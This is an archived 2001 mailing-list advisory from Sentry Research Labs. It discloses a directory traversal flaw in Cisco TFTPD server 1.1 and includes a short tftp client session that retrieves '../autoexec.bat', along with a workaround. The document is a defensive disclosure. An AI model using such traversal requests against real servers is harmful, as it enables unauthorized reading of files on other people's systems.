OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Siberian (siberiansplashpages.de)
Date: Mon Jun 18 2001 - 08:29:14 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [Sentry Research Labs - ID0201061701]
    (c) 2001 by www.sentry-labs.com

    Note:
    This advisory is for information and educational purpouse only! We
    are not responsible for any abuse or damage resulting from these
    information.

    Author:
    Siberian

    Topic:
    Security Bug in CISCO TFTPD server 1.1

    Vendor Status:
    Informed (06/17/01)

    Vendor URL:
    http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp

    Preamble:
    This software is some days old and I do not know if it is still supported,
    but it is a serious issue which should be reported. The bug itself is very
    common.

    Issue:
    TFTPD is vulnerable to some kind of primitve directory transversal
    attack which allows a remote user to obtain any file from the target
    system.

    Exploit (using tftp client (Linux)):
    tftp> connect target
    tftp> get ../autoexec.bat
    Recieved 218 bytes in 0.4 seconds
    tftpd> quit

    Workaround:
    Install your base directory at another partition or Hardrive (not c:)